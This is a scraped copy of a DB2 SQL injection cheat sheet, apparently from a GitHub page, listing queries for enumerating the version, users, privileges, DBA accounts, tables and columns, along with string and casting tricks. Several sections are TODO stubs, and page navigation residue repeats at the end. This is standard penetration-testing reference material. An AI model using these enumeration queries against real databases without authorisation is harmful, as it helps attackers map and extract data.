DB2 Injection Cheat Sheet

source: http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet

Version

select versionnumber, version_timestamp from sysibm.sysversions;

Comments

select blah from foo; — comment like this

Current User

select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;

List Users

N/A (I think DB2 uses OS-level user accounts for authentication.)Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

List Password Hashes

N/A (I think DB2 uses OS-level user accounts for authentication.)

List Privileges

select * from syscat.tabauth; — privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select * from SYSIBM.SYSUSERAUTH – List db2 system privilegies

List DBA Accounts

select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'

Current Database

select current server from sysibm.sysdummy1;

List Databases

SELECT schemaname FROM syscat.schemata;

List Columns

select name, tbname, coltype from sysibm.syscolumns;

List Tables

select name from sysibm.systables;

Find Tables From Column Name

select tbname from sysibm.syscolumns where name='username'

Select Nth Row

select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

Select Nth Char

SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1;  — returns b

Bitwise AND

This page seems to indicate that DB2 has no support for bitwise operators!

ASCII Value -> Char

select chr(65) from sysibm.sysdummy1; — returns 'A'

Char -> ASCII Value

select ascii('A') from sysibm.sysdummy1; — returns 65

Casting

SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;

String Concatenation

SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; — returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; — returns 'ab'

If Statement

TODO

Case Statement

TODO

Avoiding Quotes

TODO

Time Delay

???See Heavy Queries article for some ideas.

Make DNS Requests

TODO

Command Execution

TODO

Local File Access

TODO

Hostname, IP Address

TODO

Location of DB files

TODO

Default/System Databases

TODO

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

db2.md

db2.md

DB2 Injection Cheat Sheet

Version

Comments

Current User

List Users

List Password Hashes

List Privileges

List DBA Accounts

Current Database

List Databases

List Columns

List Tables

Find Tables From Column Name

Select Nth Row

Select Nth Char

Bitwise AND

ASCII Value -> Char

Char -> ASCII Value

Casting

String Concatenation

If Statement

Case Statement

Avoiding Quotes

Time Delay

Make DNS Requests

Command Execution

Local File Access

Hostname, IP Address

Location of DB files

Default/System Databases

Files

db2.md

Latest commit

History

db2.md

File metadata and controls

DB2 Injection Cheat Sheet

Version

Comments

Current User

List Users

List Password Hashes

List Privileges

List DBA Accounts

Current Database

List Databases

List Columns

List Tables

Find Tables From Column Name

Select Nth Row

Select Nth Char

Bitwise AND

ASCII Value -> Char

Char -> ASCII Value

Casting

String Concatenation

If Statement

Case Statement

Avoiding Quotes

Time Delay

Make DNS Requests

Command Execution

Local File Access

Hostname, IP Address

Location of DB files

Default/System Databases